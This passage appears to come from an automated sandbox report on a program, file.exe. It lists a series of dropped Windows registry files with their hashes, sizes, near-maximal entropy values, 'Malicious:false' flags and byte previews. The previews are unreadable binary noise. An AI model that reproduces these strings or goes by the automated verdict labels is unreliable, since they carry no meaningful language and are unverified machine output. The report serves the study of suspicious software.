          SSDEEP:192:qLJe8cyM1Mbohc8Ib4BaiXjgI/5A1RJAGsdYUMKL82F:QoTyM1MkhfIb0EaAGGGMs82F
          MD5:D4378637CBA093D32543DB9795281EEF
          SHA1:A8BC8F0CC604539BD2EF4D2D284A58516B5587F8
          SHA-256:656DA55B914A715CD385AA22BE7E119EB82E0C3B82D377B76FCFA083BB6F5D35
          SHA-512:E17A1AFE69F68DFA1B65031D8900C39FE9118885437BF32E08C4CA47FD36CCEC73AC71C1EE9707A8387567F1EA353ECF783D71668DC40CDE2DE84FCD6172A0DF
          Malicious:false
          Preview:regf.d..f..x.^#..G(.dgS.+2a1.k..8..TN).K.|.jzz6k.._....a.......g......"3CL.$..T".*7...Kmt.....6k$(.P.hs.tM.H...Z.......R.......h..[1.(.'.=..[..._.. )qRb4.f.s.plx...+>#.*....E.........3].5.mgA..A+....7E......n3.N./i.!....5..-.z.Y..).5.w........G....m:}H......d...A.G.@i..g..j.|....3....g.N1.U..F..z...S4...u..!.$...>..Y.C,HO.~N.......H.].Yk2&.7uHK.i.R.s....iZ...k&.....L.......~..q:.[.0z....ilg..6....(Y...x...^6.....tj[...u#...[I."mf.3...v`...l:..lW./.D.j .....Nu....6...h...Eq..dF.<.W~.......@]F.bZF..<e..~.dU.W...#m...S..}.Ex..3...8./yR...).c.u.0.W..8C..<.I.y.........V.&...)5Oa.8...&...nU.A^..o.7.O..Yv.]..3....FT.D.=.]/.[....Z....b...r3vjun.....J.r.<.Wu..........'!x.D-i.....Z..?.....1A^.";=.H.!.._....{tyS^....D.Hj.)8..H.......@U....s..[....;|y...~ij.&...&..s...h*8....P.....E.A.t.A.... ..F!.,........_.C".l.y..}.......('8...f.D)T.&..,kz|.....).9}..[......-E%C.$...S[..g>.f*..y.A.........Z:......9../..*....U?6.o..[...F..!.B..x;.N..<...
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978406945906744
          Encrypted:false
          SSDEEP:192:RQ9VGHLCJfnTK3sZBh8f44uGjRTQxy3I9jtgwWArOTXW++fA8DLVI3:RewsnHZ78f4v+6y49jtgw9OTXvSrD5g
          MD5:096E1FA6C5324350DA89FFC0D6EFC714
          SHA1:79B4BF6D8FF2B25809D5E49F9DF47ABDC6F67420
          SHA-256:01935CC83E1B6AEB75CB2A59A83CD007645604B675B57B58732C29569B550612
          SHA-512:5FAF819E5F91ED472A670A56D0C1EDE243CC5A8B3377E5276A106F5E65E38B4C47830A2A105E0CD2ABC58CD6342EB1B6C0304AB793E48FCA0B0D4C380B5669FA
          Malicious:false
          Preview:regf.s.1...e1_.m..}.=.Ls..W.e...=.X.....i ....'U.4...+x.Z}....l...:.W.....d..1..e3..]...o....B.o.#.+4.g...%S=..K.?.Jj.D._IV.]...&S......wY5(..t....(m......w..{~%W...A.JZ..U.f7g....9*3...X>..:z.}_.T..4.......9..#.;..w...................M.v..\.d..8.....wDn...).....a..h~Y'<..#.cS.Jx\.<:.U}..>.d-v........XZ.Z/G._................-.|.Ge..s...//."...#...#"..K.....+..x...z...[..J.#....o.y......!..9....7d.]S..}D......2..9M....$..-4r.6f..se..u..h.y.....maP..xL......"...^..y......./Z...d..6.<.h....U..H.+..).Si.`..k..M...b..43....$.K.`xM.....y..qj..fK.....@..Q.k.v...u...g.-F.X.t.Yk........J.rj...E+.V.t..SR.J.O....W.l..(G..x/._......j..7)..3.D{`.....Y..4.U>.E..fe0......2-..W-..cn......&h....HA.f#....J...fGX.....5J.!r9.&VhR.+6.T`.7.<~6.on...!.s...K.t...L...../.....O..)^|`...B|6D#....1".NR>PC|y..p...4....f. D..Z...K.h..l....>..g.k....e...&+.Rn..H........M..)m....KC/c..J.I.>X9..NoM..:..X"...W...*..i..Z Dw.H.d.x.....$..z..t..ed...z...0.C......!.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.977668089958228
          Encrypted:false
          SSDEEP:192:GOqkwlKqB/PEnuFCHkyP3aar9TC6r9ltIgO9TKnemLaMrE7MZ:rGvB/wIFHar9lrYMemL7S8
          MD5:BC330B98914F1E50727DA93459235868
          SHA1:FFD59705DF6E798A04B86E9E649FB3C0E2CAAC69
          SHA-256:2AC2F9D8CCCF29FE6C1E97C371138AAEFE8FBEF3097EA85AAC3826919D619DD4
          SHA-512:A5E42BB2FBCA41CA094161181E2F2E9AB22D0D55AD9FE079B37F4A11E862D1533B15AC8F645BEF63F2008C66432ED7066E82B34CBF1536DEDABB6B635257E9F1
          Malicious:false
          Preview:regf.>...G,=. .io%T.PcGd.R. .jw.)${...Zc...............fc^.L..1.g.....C?F*....%^..t\......4S......D#s..........?b9.....i.f.......X.t...\..u..W......m|.%...=u.....b!c.M....O........W....~..q...<.\3d....d."f.u}1....XN.?...h........0..W....tj._.O#.......sA=.|....s..4 [Nu';,2.....r.l.h.H...9.....V|...I.....=G.[....8..U(P_+1b;........).I bY.....`...}..c..p.A.X2.^..MWY.j/.M.~.)k..[..../b/K.u.._..O.....|...+.~.+6.9..............,..@.0..$..W(..$A:..:....w:.'Hkgg...V.....?..8.P...6:O.@I_.4..V._~.UF{.S....K)......dz4..!...(......q-4...F./.'..#.:w..Fd..c....a..s..yl..b$5.wr.fo....N5.Q...&....]..Z...PbzT..mUL.1U.Qj.B.X.d\.<..U..g/.....Bc......n...fr..b}$w..X......>...vy..~%..T.....n..^.w......5...n...b+8....u<'.60..).Q.m...-....qx....1.Q........x..L..H;..+e...b...sU.,.P.a.$...1d.I.._Q...).. .-n.|.L...1...K...5....o.3P!...U.I#.....6..8.'..........Ii..^.xd....E.ZY...../lQ.........b..J5...C.......a..!5q^.]b4..N.Rxa.h....T.Ps......^..wN.o{&i..[y..
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.975766711477137
          Encrypted:false
          SSDEEP:192:BunlQQL9g7M0vzjtge6d1cx/EFAklil2F31L8LohBSk2StzwI:BulxOM0vzhAnc1MAwilm3tiMdnzX
          MD5:D4E7D465E8D12F7FE29E5738AD6A0EC3
          SHA1:992F063A291C6ED8AFAF31317552CBF8A7E57D17
          SHA-256:1D6C1D8503B8313631C7FE1EE8373F47F1CB900D2C3E207AA26A0659D2990EB5
          SHA-512:D69A4510D2EB087C133BEE7781F9323239B118847746EFD8609883F649CDA2D1B16333AC05C68822566A6E7EA4FBD98004A13E9807230DEF7C508711BE595E37
          Malicious:false
          Preview:regf.^F.V......../.......U.l..o......}...;5.e;.R...W.-j.,..f...?'Pv.~.KX.....c#E..G.......g..AL...7.$........!A.6`?......I.a.`...4.5.&...15..o.j..n.l......(..#Y...Rd[.m30.R1<D.i.....v....d.]qn.*.....pj?G#"...p.v.n..F..?Rl.|..l...uD."2pH....7U..../&.9...O...^81).T......K|-.&.J.?..BF...@.X.@qjv.|. +V..>bf.....%.)_......O....`]......:q...[...|.t.......L...y4...(.t... ...q..Y7.*.l?.g9b..d|vb../G..$&.3...Ef.u.......mR<..~Lj..~...e.g.f.9.?5......F...`..DE....o...e..r.Z0.A+(..?...F........~..$....F%HP._.a-uW.,9.v.v6..$..I.+.#.....c$..@C.^C.o..S.......W....u.v..P7.q ..L~T..#..3..#D..+.D.......................3.kU..4^....q$2o.X..............-..^6..0.,._K...^....'..l./o.....8..*gb..?Y.i#+B..j.Q&...,S7W}.8T..4Q..d6*...r.PS........]..t\<D{2!)."T.,.?........EI)uGv.S.-.;.}...A.C.8...'Wp.hbV.0.(.,gx.~.. zE.&...o...5...X...a.S........&y.....r..v...1.z.>J#..o.)9.y.].H..-........4[.4.F'#C...D-.....B6,..9....QB.._..r.>. p.q.E.oFI.xt.!z.A..,3..R..B.Y..#Px'.....a.'...
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978072810580834
          Encrypted:false
          SSDEEP:192:/C+nW52geZqlB/rmAqhBJJ847c+VdVo1Q1yGRtXMduZwFaudiA5:/C+nW52ADqnBp7c+VdVgSXMd6w9iM
          MD5:095609376DE1414F4C32614634B7C8AF
          SHA1:F8E6D037C540E16BC8E147D0C8ECCCC953EB0032
          SHA-256:03BE543DED358FC04E2E039868ED33FCE115BFCCC2CF4D45B4F3AB9C9A479299
          SHA-512:D543470D3DE9C93DDEED5771FA4FAB6A762EEA45052342A442B6F38AF9044B7AC0502E6363EDF0DB1C0D1FF6B5D65EF29FBCFC1210BD30C8C7862504F16488E1
          Malicious:false
          Preview:regf.?....3.l.c..G.....br."#.|..q3.:S.<..~..B.L,U..-.T\......_..K.L.%A.x.....a...[...B|..,f.....^.vi^.....z.E...2(.4.^..n.....GU....+....n.....o.^.g<j....M}4..Y3QM@*.-.)3. ..G.....xx......'..".....?...>:..AL.E..2<%..7.vH.G....R...w.!..v....Y*.@......2<*..-..+...3.ST...s.W....}...d..P..Z6I7.+.-X..O.X..-.X.j..gYF.e..P.O.>....X;.....*Y.Fl.........82..Tc..Xw..d..9Y$..6R.ZN.]n<>j..!....=...?.;6....fM,J....qe+.=.JhV.|t."B}\.....=/.b......y.....g~q..>..?.i:..e+q.}.)*.....:7.....N....1'...2 ...9s..d.......C6...i4.-.C..v+l:.e..e..<.....#q,.ld].......v.&..{.Q.m...\...a...ogiD..{........j..~.H9.....2>......a.Z...n......4k....b...7r..=.v....x..6....J.r1..=d;....E..!.....3xA.....t......1B..o.^'Z.@.72Rr.........+O.e..?......~....b...RP..pTxu.B..^.... .F..7...Lnk...R5...@44J......6/k%tE...............X..mA(.../<1..........of..n.XJx.l......q..!E4r..9...{.w'.......+.bq...:<.kr...p.U\"_......Gm(..#...p..w..1.....Y..x...6.......<\....;?[B._.`n..
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978867509560215
          Encrypted:false
          SSDEEP:192:gaSRav0jwkxSoSokc0AD8jDiDlzVkFJOUdYkMV5YWCxLbSKhP:gNav0jwk4mzwjGxzVkNdY1QSKt
          MD5:E06288D82F65FFCD02E5AC57B38FD55F
          SHA1:905958368D12E74C759153E53825D3D84D72E321
          SHA-256:7469C9A2B9BBE50E4597D6A6DCB016AF2EE9D13C6DFF2FB4864646BAC73105C6
          SHA-512:F5FA07DF54B0B39BACB1F7EBB7EE968F456983FB84A3642CDE995994CE53100B3E3B5C30632428D30885C8AA13AA6C5CE4DEFFDC6360F08F8CB9FC4BEC23D66B
          Malicious:false
          Preview:regf...R..G&.DJ...n..nTNW.d.*...j....A}...<.j.\....CE.7g?E...........s.O.o....l...5...P...@.......~t.......f..Z....V>f..~..ldC..BMO.`......xlO@.gk^..%;.7....d......+?x...9.....B..Dj...+...{3.........`.&WoA...E..y%......m<$.].eH.g..Z...o......(6..2....{..i...[.T.v.....,s..sg.yn......$.\A.......b..Ph2..-..ir'q2.Y.*i.)..x.d.........3....k(.a.Q.......`...F.A..n#.h.4......H....`._.E.0\Yi...%.......-....SWk.1.b..N.V..f...LT.B..~l-D.1...zP..R.....|2-...G;e.e......1.nMA.Q..%!...0....fM.B..Jk.ea5u.i...8.kXS..GI/.#A..*.~<.....l...z.....+..-.."..G.N..F.ce.....F...~., .....zI-t.."......v.l...Y......{z..._..Z...`..K.....W.en..^.\$h....S.....8].!...7..z.-.h...j.}.Jn."..u;........X....>..b..6V.d.jr..?!.N.`....o.E...j}...K.D.Q....x^r?(.?...7+.#...>.i3...Nh.w.g...bU.?..g...\.....F...jv.*B.........\3?.e...l.~.;......a.....<..z......B.....8w.!.x.... .=.8....".0..+.n..J.h...$...../.....yq+.3.V+.9.o3.M...9.u'\j.........(."..cZ.7..'....@..2[LO.o...<?A
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.9769962075597824
          Encrypted:false
          SSDEEP:192:oeUR6ITmeEBNivzSZPgDxyAVweewQC9LeUW3W1:oejITmVBgrJIZjwQfUUW1
          MD5:6AEB55F54DC055DE49B624D2798FFBA3
          SHA1:BD7A1B105ECCCAADB9D4457292B8A43A4537CF83
          SHA-256:8B0822EDDED3FF4CB6ED7086CCAACDC559977C4A553C8191C8380A8E10CC9490
          SHA-512:95E8A08AB93560B6B537327A2F6C4F8B95FA6C8061C70C17D21E58578FB777F45CE1CEEE3F29C18A491E29B6779306E814414C2370672A04A4DD25E3BC55DF00
          Malicious:false
          Preview:regf...H..:.....(d...)z.......`<....lhG..)...b.Qy...-...9..a. ....`0...&.fN..CR....D`....)|..1......y...&..%..{.k..}..7...@p#......._M...iz.~.V.)29r.=..p..........e5.m\...Ly.}....Z.W..A...-I....qA.v...O/..[x.......,E.#.Uu3.{[...W..j!a.g..9v......B....|!..2.(.....G.#.N....E.z|G.{z{.s0.g..8..xQ.tO5..;....~Z.Z$L)...Cd..CGx....}vi9.4v>....-.B...... Zd#<..Wu.i...Y9.....}.4.......oYaw.$.....=e..0xS..,")... V...p..V..@.S..G.&/..7$u.a...E..D..`e......cI..L....A.... ..7XA...|.o}.c.5....{....g.L..3:j(.%..7S...T..?e-.h.......0.X.. ...' O~.:kG.I.T...zn[C.y..."(s....R.~....2<!........xfa./pJ......mc).^...\..#m....A..E.3.I8.q.0.7W}.WQy.2.`.P.H.QKp.....XK..9.b.5.).._..L.Gw....?Z.... .IAv}O.........xp$.?....Y..w|Q....@..}......G..WZL.1...K..m1.e..7C....... ...e...Q:..|9...|&..=.@~..6..M*.".p.~.s...U.)...m#f.......iX..........O8W=..>.......n29.x.q...4.m.|.;<P...3".Ej.^..I....X.{..MS..P>y.xCe.. .Z........o.L.=.F....E..RT.d.PiO.......S.=........lR..q.Agc^;.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978195828565846
          Encrypted:false
          SSDEEP:192:PabiihTbCkMJRW72lC3t+GET9oBlIp402ssSIZQeZJZ8Bn1oJQ:P4iixujRuoth9ocp402ssSIZQwZWnR
          MD5:A2DC443CA4B151F262D0AD6A89E4AAD4
          SHA1:A7B58B33EFE9A06371B7799D01DC1814E1F218D5
          SHA-256:C5029BE8DC0E75E4CBD8CFA130F16F6D2521242C6D2DC314AC315CA49059024E
          SHA-512:74C495C833EB59C29ED6331BAA33B939F07DDE7AA06959F0DBBAE6673C94D13E554BC8BD1A2E7F7EF61C2299E3488F62C5D8B8BBD4DED37644D8ED02B0225051
          Malicious:false
          Preview:regf...D91......t...8.z..gH..b..n...za.vl.U.._..x@EH.f..Z`...ELc.....a.-*{...Y...0.|4....h....s...3.,..qFk.,%.n..D.q*......W^.i.w....3.9..sO.wo..$..0..t.'/t.7}.G..n.....n...EAB..@.N.x......*.(4D..]...D..w.e.$.L....U.Z....3."..t....m..k...>._a.>......l...H.B. w........8..>...,g...kp.nZc..k..-... }..I46fd.Kp...m.~./$.......EjY....t...b... X.)...s...0.......X0/.....y.A.g......45..v..j......@.........q......N+..`../....(...qFgb..O.B.4P..0....]zM..e.[^....}.......h7..Z.j.^..A.<]w .k.@..w]..#..<So.b.o.......}...t.,.Rx..J6+.uL..f..I$...Ci'}^....Z...Z.lod..7..:...6z'."Xj.5.....U....6....<.D....u.XQ/2...;.?E+..2m...9.>.O.BE.(3k..K..............!=.n8.T.t....=y....O.F..8K+.1L.N2sd..."..R.N...,Z...?O.vfA.g#l.....y...D...aT.J.DQ.:)oR./Z..$.+.......=._..Fb&......U.Y..*#@p..'y.m..7l1.KF...b<.k?.B.w...a.}5.F?.y.;(9?;]..........)...y..2.......6......]...F^B..T.%L..0....[..\.w...c...O}.S.x..J...].d!NZ........,.rZ.....6x;.......V]..7.%*.k....-zL.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.976906887154016
          Encrypted:false
          SSDEEP:192:osgvOE7Sqi2knH30Vrolnggwks0Lmr9rtrusLSYUrX4Pg:H3xH3FgOurgYUrII
          MD5:CD5D4AFCB157D6A2F41285DC9298FB62
          SHA1:E82AB52E0AB05CE8B45F04067780F044CDFF9DFA
          SHA-256:D99CCF8A4D199E565789C5F918FA2C9E2D7CAEC66719BF4DDF0B566C58DEE4C7
          SHA-512:DAF1F7FC86C890703E26479E8A46664F567C64F10321B699D5D68E6766435E87E65692E1BFA31C10892CD3D56461D36CC636D3030D0E9502E992656C569EE6E1
          Malicious:false
          Preview:regf...9.A.........)..SP..|.9-......_.."..z..........|R....v..K..Q..N1..sY:f.G....7.L.y...^.o.^D[.".`....B?;.....u..\.M..k....1..o..4.].".e0..8....f@PK..Q...u..`.4.R....q.......^wP~...,..e.N...=......G.J-.4...I.!.4c....j...1p..F..A...|;2...d.._y.'.0?....8.j...O.......{J....j...].E..)+J.:..F.{........1.%.|.."..<..A|.=...R..F6...o,n#D..7..T......^8...H.m.J.|v.]m.aq/...)...ew..fAf...a)|.M.6..?OhD8.O..G.f..E....Y.Zh..B...F...!.AQ..Y..i^+.z#...H.....,}..0...9j....%..R.p3......3.]+7.]...z.iVo.....#.....r.E..9 ..r$.Z.!a7..)...M^.~.'.|`....?.;..h._..&"..T%..I4....h6....Z.1$6...(.}..g1d.....{..,.Uf...3K..(W.\.vY.....{.o_!...hz<`.t7s/.J......[l0h;.4....T.q.C...._4..W.'...LY......z1.@.F..../!.AZN.L......+dH.&%)...>....;......I..x.&n...WetqSy.r^Kb .....#D.,5Q....H:.{.E.a}....o.2.v.=.6F.,.:.w....x..6....#m.-.!fw3...QR.(.Z...$.s...!.h.J.Q...T.B.0....0..%\....7....z.WM.~nP..mC._.i%hO.*...._..1Rr.4i...qMj......==G....t...m...3v..`....Ujw.._u/...R..Wr`...R.~
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978807294721602
          Encrypted:false
          SSDEEP:192:CpXd1q0t+wf4AABCj523HLh8radDtMde0rr+vquF3Mfh:Cf1XtbwVZ3GrcDyfXuF8fh
          MD5:0D9A73C1662F3641C68610CD21491C9A
          SHA1:01CA6115466C8C76901A08352AC899843438F3A2
          SHA-256:77E5AA4F2DF9F071A1AF157A638D90E6D92A024137D30F2EDE680C5A840586D1
          SHA-512:8B4CBD2A472D5C0C66E7FE05643AAE418ABAD026832CA656527F9D2D343837ED850829DBD4962A679C756B0E5159F19545A42A6A24308223D6C857EEBE09CC2A
          Malicious:false
          Preview:regf..+..Y......E.r...B....Py.a..O.B..w..k.)..8.^.-Vj8.rqn.GG.....b..D.k...Zh...g....:.."-.c....C.x....R...&...................5..D..SCA.....%..........^&O....OpX..+^.pW...R..n.*.......m.T.*.G...Ox...7..~...! ...,I.....[...zj......uP<...#.4t~.. Q.....|K.......q.&.MC.v..X..H.q..koH...$....kE.*...U.i.jLO....$....&p.R..=.....i.=...E.~...u..Sb..e.k....).r_...9Q....r.M.f..L\.Kc7"\Z..b.6.)..|e..]..\.MB.,..B.....Z..f..R./..8..R...W.VQ.y$. ...9}............w.#..-m...9........#...hbV...&.K.Q.dA.)..8o.BV.4De.....m..x.Z`KM.....!.....S1....t..".A...mgy[...G.{\.}.G.h|...|6!6}.5.<..pF..L.......16.{...9.......:..89...m0....F.^.....#x].WoK.g.Mc.....~.$F...B...5"Ie.....I...w....3...=....k.y.....'..k...*M.c.'..w{w,...T~2b.......K....>.f.a<.........H..aD.... (0..jy.w..K..V....j...Y...t.u...9,.fW...A...I...P....+.4z9.~B...NX.l....-$....V.E....6+8.....L.......y.g..mY...g.(.n#u|Pz.G...3c......rV..k...k.o...9OI.).9b..'.....0..hy.z&..p.".......&.......^.F.6..j....
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.977541545026684
          Encrypted:false
          SSDEEP:192:hZn9Sm/N+fk/6ereNuwPq8Rl4uOUrdaEsHPhgZaw1JOwBUKXw5s:hZMq+xerSEuOUBiwfOwioj
          MD5:3475B445CE2BBE768A77DD18DE667982
          SHA1:F2F2E8B0883FBA3AC39922FF4B2D6908DCCD0543
          SHA-256:E672CF24CF955F09FB60455708B39836D52FCBE282A8E3891ED1BA7253488C82
          SHA-512:9F3ED49A20588DB93C5F8839D60847BA6A3CF8C32BD00E9620F2F29712E4D1CCDC9B48C66D46D04617B71BB62E6EF5C323D7241DD0B130655191C5BA40607225
          Malicious:false
          Preview:regf.....f=F......H.....N.R+%....sm.HOM.3...X......Ti.... ...j.5D..... .`x.....@.aq..V}._.h!.lN.x/..~7.j...]..`......h..'7...G..~..6.5dL.aZE|.E........}..W.....4r.2.<'@...u..5.....R...I.q.G(]H...46!.<.x....s....H.5..)0.Z".W.<8R..M..8.9_..42..-|..[w=.0GQ...........X.r."...$.D.'&.....DN.!Nz.,.-+G..[....0....R.4t. .^.,..D.6:.l..]<..=........C. |..UgM...>.......*.iD..-t.X....M...q..........t.......I......}...O...2....:u..........O.J>...........Lg.c..lr.0.!....r$.v....?..y^.'...1..X..m...r..&..L.|jq^...). ...I-d..d.%9..<......3..W.J!...W.P.\.....i.D 9...Z..u6...[r.S.0<.h.i...j5.}....\O.....s.$.....?.....1.:...F..Fj.8.h1....cux.5h..w..:4.9(m..).Mb.....w...$.E.U......_.....@*l\.XB/.h.....%...._....Fu.....P.......(.....k..#.X.U......Q..vq}r......d!4..k|....m..._.:.Bu...........Cn.;.q.j..x\..>g..K<...]w6...l...4......H...L3...S.....=.c..S.ue...k.<.=..ST.....M....s...*C.......WiJs.2..$....So....I.P{..._..9........%.e.@..u....E........~r.;v.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.975851352071252
          Encrypted:false
          SSDEEP:192:Uwpg5HncrrUAS5K+qfI0boLOwJv9G+N5ae6IxIqHB6urzfEr:FgcH/lbQ1Jprae6IIqHBtza
          MD5:6911965F20F2274762FAA0681E752890
          SHA1:3A38C3DDAB81C0E315A30F34FC113E6B2D9D4919
          SHA-256:0C8E86B50AA4186D0BF3D329C88E8264474ED7AA740151FD7D55D9F4E144BEA5
          SHA-512:8FF6498673AA066D6326D1B64239EC38E239D15392640FA0F3CA8834E9A3160B704E1BAEB8264BB2C5392F6D6B310F1236298F38E8643B80B659D8133A4DC9D7
          Malicious:false
          Preview:regf.X..i......=.}m.W)..-z.;...^..-........P..A:4...yM..Z..G..Tn..JDT....~$..]..N..H..$...~..cW..\..+..Y....ys..a.?..EfR.D....}i9.G.O..4..x.`..LHmP.k.cV..v...N.`..YLp:G)!...5..o..Vk|z....M.2-..l.NK.DA.VS..H.mD'..0..Cp.5^.....q........I.i.<..O.......J....w..F..~Z.L.o.....FH.4!.^..a1~!...~.....K...8.d]Ep1H...01.2#..8.\.9.E.o,......^..}.v....\..H.l.-p.....T.i4>.pC...^e.1"%...(9Ms.......D5..3..t...^..d.F.....}.......%...JI..#5.v8o..Y....'..h..=.=..=. ..".*.|...S.......j...A|.v....0T.r.N.q...R.^...:[H.O..4C..3.l.?..|^....Ld?}.B.y..WP.?a..|.T...:.C,.l"..d.E.%wD.;`'j.D.z.Z~..cp.C...}.Je!.t..xa......pd.Z...........i...OMK..<~A..U.xe...!4.j....EM^E...D.^..%K..O..2.2(....Y..|......A...s..7.v.f...)&.g.Ap....~k......60T..x{y..R@n...#.(..bJ....3..L...1#....O.v.n.'T .&...6.W).....s..\o.P.|.[S,.<.'..A!.....K...&T5..b.%.e.7.^..M.....p....,..}....~tR./`"I..$...j.Y........_.~Q.A!:.?!...j.Q%.L.Z.g..(F*.FY........4ek.....~.....>..P..=.l.e.?.s|......%Y.x...E....
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978441453861439
          Encrypted:false
          SSDEEP:192:R9NMjSiakNH+33vt0wMFtBJSv6d2ivMdoSwT+XFGrfu22vG:R9Wjx9+33v6wSBJSvliUdZXFIfj2vG
          MD5:51F4D1E3B03C33A2B3866EF6EE3E5844
          SHA1:C3795823480D8370712F5AEA400998C150B350C2
          SHA-256:5BA2D19120815AF61AA0FBF771327BBCF1E17370D28764F6024EB9C238868CC1
          SHA-512:2EC0B2BFB802016AC94615531EEB407697E04482404CE90F8BCE77A09454893BAFD6F56544DF0E3AB3D0A4273938722283AC8C595A2907D3587DD6796469CFCF
          Malicious:false
          Preview:regf.`..k2....WX.....r.X.....$....p...go.AJ...............V....; i4.E.......B.Ya..........P..!.....x.....;.U4...........7......~".A1+.~.]P....5K.1.n^uH.....G.LEi......./j0.%Ym.....#....m.|...q...o..?I...u....4.Az`.....cE.W..j...*..7..O..A..)3..<..7,.Za...!DaU1h.3.....`:...fL.NP^3...cM.._.a....y.c...o..AN..A...W..._N.k.fX{...w.b...A..m`...oG..)..d...LG......H-.}.%..Z..c.ui...v..J)....&b...-..-..QMq.^....o....}....m.T..W.-w.IA.n...9l9...Qr.w.........L2...14pw..4.....3~..Y...>....K...|&...7...!..........n.%pH.....Y.7..f...P..Q.4.{.x..QJ)1..T.......E....(qk|.#.Jkt:...w.=.....%.0q.".).;Nu..8.>Cz.Q.....e..z1..(..QG.d..s.[..t..1"p.L..~..a)8.....e .....<....yp.b...8.Nt.U...oJ...|.d.i,....>.i.zZ..<.F....id.<PG&"......^.Z....].......Z.P.o.s..ix...`....5K.7s.3bD..=.(y.5.L?.'Q..pJ......3V...X.~.M..v.,..[[.......0.n3r..>.}.......`....^.} ....CH.M.e.0.Ye_.. [....G.cMI+`y..{A8:.x..gK.......x...z.#...:t...K.<..c7.^.3KZ|....y....V.Y.).....t.B.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.978512461651568
          Encrypted:false
          SSDEEP:192:KaILmFrbfo6XK0r3PA0Ur7x8LNuZ6RQm7H5XXGs2JNJjE+Stida:HILmFrbffn/A0Up8LQZ6Rn5GsGjEBIa
          MD5:4F1D0622176A09E52AA1B88412454C9B
          SHA1:6376F892FEC656F2F5473DE41502A20A3A53C4BA
          SHA-256:0F7D5057CE1558F32C7B5A39AB7085F45AF44B4CDFF6B3FAA71861FD72214A9B
          SHA-512:C40CD2FA6E05FEAB58A1C3AE810FA064A63F1892F615D382DBA2CAC53F2EC66D918102A0F3A9A0B017C4D9CF2FF15D3EB5AE7D194FFAFE9BCD0446504C53E197
          Malicious:false
          Preview:regf...Vw.d...5........W.....G.....y.._.....wj...rtk........K^...U..D..Q..,....w...6..R[U.}......].9. .....f.Q..........M#..b..S..B..}....._<S8.E5Hi..%..nwS.xH.T.3S.:......t>M...F..v.]..A....(......kr.A.>1.".97=|... .......al.L'Fy...Nj..^.5.<...$M.k.G.Tgm..)..*k\A.W..#I.z...^.zH..M...A.. .y".s..^.N|U...w*,.G....+.'...x..x5:..Lh...k.B)..t....i..~...tWCS...db...}......4..F....:............JV..&.Vk.9.UIZ..qd..].....c.............x....c.7V..r.d...6...2<...;...-..E.G..V..pN....3.3|8;)[JQv...:.j....0.V.H.RWs..\.N.......>....x.Lh.9../.....8..&....%~..>b.+\l..Do...3...|H&..A..S D.`...gl..`....p.S....Kn..:.....h....!h.}..`..Y.X..d.?..J....i..#. R.ll....v,...$....u.K......!....j..WO8...............T.~...f[..lP.....e.3e...K..V.Me..s.......\v.U....>.K.+.j...".m.W......p9X4f8.o)..It....7.K%....,MI..x.{....n.Wmvw......#-.#..............t.N5..)=q.;.....6.~.A.....R...|.....H.....3...t[..M6C.EcM."}.=..B..6L.....;;...SC..oQ80Gys}k.p.a...}....M..|.t..
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.977493043768903
          Encrypted:false
          SSDEEP:192:ItOFNAvY1as2alpXdeEODgRia5cc8iQ6dwmMb5XJmaD3:ItOhZ2UMEOEiQcViB6mM1EQ
          MD5:7B03A3BCBD2B587389152BC8CCA6CD77
          SHA1:D635F75A698755B9F1270D84E2691BB6DF10BE94
          SHA-256:5269530AC731D7ED9DEBE8E81D88F3800BF6DFF06F54304F2F2796151813C51C
          SHA-512:3D81CA1BD802B7471844620B8FFB8F07A01A44EAAA1D4029E3A1B36D2D4C29D70AD217409A09DC9EC7278049B4237AE2C3A9D4AE5590E45A3B2AA8EE34D811A7
          Malicious:false
